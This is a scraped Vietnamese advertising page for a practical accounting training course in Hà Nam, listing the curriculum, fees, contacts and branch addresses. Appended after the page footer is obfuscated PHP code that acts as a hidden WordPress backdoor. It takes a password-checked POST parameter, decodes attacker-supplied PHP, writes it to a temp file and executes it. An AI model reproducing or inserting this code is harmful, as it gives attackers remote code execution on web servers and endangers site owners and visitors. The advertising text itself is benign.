1

Trung tâm đào tạo kế toán thực tế tại Hà Nam

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

Trung tâm Kế Toán Hà Nội khai giảng lớp học kế toán tổng hợp tại Hà Nam, với 100% đội ngũ giảng viên của chính KTHN đi về giảng dạy, học viên tham gia học toàn bộ trên hóa đơn chứng từ sống của các loại hình doanh nghiệp. Các bạn đang có nhu cầu tìm cho mình một trung tâm dạy kế toán thực tế để lấy kinh nghiệm đi làm? Các bạn muốn học trên tất cả các loại hình doanh nghiệp: thương mại, mại, dịch vụ, sản xuất…Các bạn chưa biết học ở đâu trung tâm nào vừa uy tín – tin cậy giá cả hợp lý, học xong lại được cấp chứng chỉ kế toán?

Xin giới thiệu ngay cho các bạn trung tâm kế toán ở Hà Nam địa chỉ tại đường Quy Lưu, p Minh Khai, tp Phủ Lý là nơi đào tạo kế toán và làm dịch vụ kế toán trọn gói tốt nhất hiện nay.


Giới thiệu hình thức học và giảng dạy của trung tâm kế toán tại Hà Nam:

 • Đầu vào học viên có bài test để khảo sát học viên, giúp giảng viên phân loại học lực của học viên để từ đó giảng viên biết cách dạy kèm cho từng đối tượng.
 • Với phương pháp “học lý thuyết để hiểu rõ bản chất sau đó mới học thực hành để giỏi nghiệp vụ“.
 • Mỗi khóa học có 10% học lý thuyết còn lại 90% học viên được học toàn bộ thực hành bằng tay trên máy
 • Dạy theo từng phần hành kế toán, kết thúc mỗi phần hành đều có bài kiểm tra để biết học viên nắm được bài không, làm được việc không? học viên yếu hơn được kèm cặp tận tình theo đúng phương châm CẦM TAY CHỈ VIỆC.
 • Kết thúc toàn bộ khóa học mỗi học viên được cấp chứng chỉ kế toán do Sở GDĐT HÀ Nội chứng nhận, lưu thông toàn Quốc và không có thời hạn.

Nội dung của khóa học kế toán thực hành tại Hà Nam:

 • Toàn bộ khóa học kéo dài khoảng 2 tháng tới hơn 2 tháng và số buổi là 28-30 buổi.
 • Mỗi học viên đều được cấp hồ sơ, hóa đơn chứng từ của một công ty bất kỳ đang hoạt động để học viên tiếp cận nhanh nhất với công việc thực tế. Dựa vào những hóa đơn chứng từ này giảng viên sẽ hướng dẫn các bạn làm những công việc thường ngày của kế toán trong DN.
 • Học viên được học thuế GTGT: thực hành viết hóa đơn, xử lý các trường hợp liên quan, kê khai thuế theo tháng, quý. Xác định được DN kê khai theo phương pháp nào khấu trừ hay trực tiếp. Học về thuế môn bài: kê khai và xác định bậc thuế phải nộp. Học Thuế TNCN: kê khai thuế và xác định DN thuộc đối tượng nào.
 • Dạy cách lên sổ sách học phần mềm kế toán: Với những phần mềm thông dụng nhất hiện nay mà các DN thường dùng như Fast, Misa các bạn sẽ được thực hành hạch toán xử lý nghiệp vụ kinh tế phát sinh như lập phiếu: Thu, chi . nhập , xuất…cách tính lương cho doanh nghiệp và phân bổ các chi phí. Hướng dẫn làm những bảng biểu: Bảng chi phí trả trước, bảng phân bổ… Lập bảng cân đối phát sinh hàng tháng hàng quý.
 • Dạy cách lập BCTC cuối năm, hướng dẫn tạo bảng cân đối kế toán, báo cáo kết quả kinh doanh, lập bảng thuyết minh báo cáo tài chính.

– Giáo viên giảng dạy đều là kế toán tổng hợp kế toán trưởng có hơn 10 năm kinh nghiệm thực tế, họ đều nhiệt huyết, ân cần chỉ dạy cho mỗi học viên, dạy cho tới khi học viên làm được việc mới thôi.

– Học viên được trao đổi hỏi đáp trong từng tiết học, bắt  gặp nhiều tình huống nghiệp vụ phát sinh các Luật Thuế mới nhất hiện nay.

– Mỗi lớp có từ 15-20 học viên, mỗi người học và thực hành trên 1 máy tính của chính trung tâm.

Thành quả học được của lớp học kế toán tại Hà Nam:

 • Hiểu được tổng quan công tác kế toán DN, hiểu được quy trình kế toán của các loại hình doanh nghiệp: thương mại, dịch vụ, xây dựng, sản xuất.
 • Tự tin trong việc lập và kiểm tra bộ chứng từ kế toán (hợp lý, hợp lệ, hợp pháp). Biết cách ghi sổ kế toán chi tiết và tổng hợp, biết lập báo cáo tài chính, biết cách kê khai thuế và lập các báo cáo thuế.
 • Biết cách làm kế toán chi tiết và tổng hợp và lập báo cáo tài chính trên phần mềm
 • Được rèn luyện kỹ năng mềm tổng hợp, tư vấn lâu dài hỗ trợ khi đi làm

– Học phí của khóa học là 4 triệu cho cả khóa, giảm 30% cho tất cả các đối tượng trong Tuần Lễ Vàng, giảm thêm 5% khi đóng đủ 1 lần học phí.

– Thời gian học có các ca Sáng – Chiều – Tối – Thứ 7 chủ nhật, phù hợp với từng đối tượng, học viên đăng ký xong không phải chờ lớp lâu.

Ngay bây giờ liên hệ với trưởng phòng đào tạo để được tư vấn 24/24 và xếp lịch học

Mr Ngọc – 0973.761.751 Quản lý tại cơ sở Hà Nam

CAM KẾT KHÔNG THÀNH NGHỀ KHÔNG THU HỌC PHÍ

 KẾ TOÁN HÀ NỘI GROUP – TRUNG TÂM ĐÀO TẠO KẾ TOÁN THỰC TẾ

Địa chỉ học kế toán các cơ sở gần khu vực:

CƠ SỞ ĐÀO TẠO TẠI HÀ NỘI

CS1: Lê Trọng Tấn – Thanh Xuân – Hà Nội.
CS2: Lê Đức Thọ – Từ Liêm – Hà Nội.
CS3: KĐT Việt Hưng – Long Biên – Hà Nội.
CS4: Quang Trung – Hà Đông – Hà Nội.
CS5: Minh Khai – Hoàng Mai – Hà Nội
CS6: Nguyễn Chí Thanh – Đống Đa – Hà Nội
CS7: Cổ Bi – Gia Lâm – Hà Nội

CƠ SỞ ĐÀO TẠO TẠI PHÍA BẮC:
CS1: Trần Hưng Đạo – Phố Kim Đồng – Tp. Thái Bình.

CS2: Trần Nguyên Hãn – P. Thọ Xương – Tp. Bắc Giang.
CS3: Chu Văn An – Hoàng Văn Thụ –  Tp. Thái Nguyên.
CS4: Giải Phóng – Tp. Nam Định.
CS5: Lê Văn Thịnh – Tp. Bắc Ninh.
CS6: Kênh Dương – p Kênh Dương – Tp. Hải Phòng.
CS7: Chu Văn An – Vĩnh Yên – Vĩnh Phúc.
CS8: Đoàn Nhữ Hải – p Quang Trung – Hải Dương
CS9: Nguyễn Văn Cừ – TP Hạ Long – Quảng Ninh.
CS10: Tràng An – p Tân Thành – tp Ninh Bình.

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}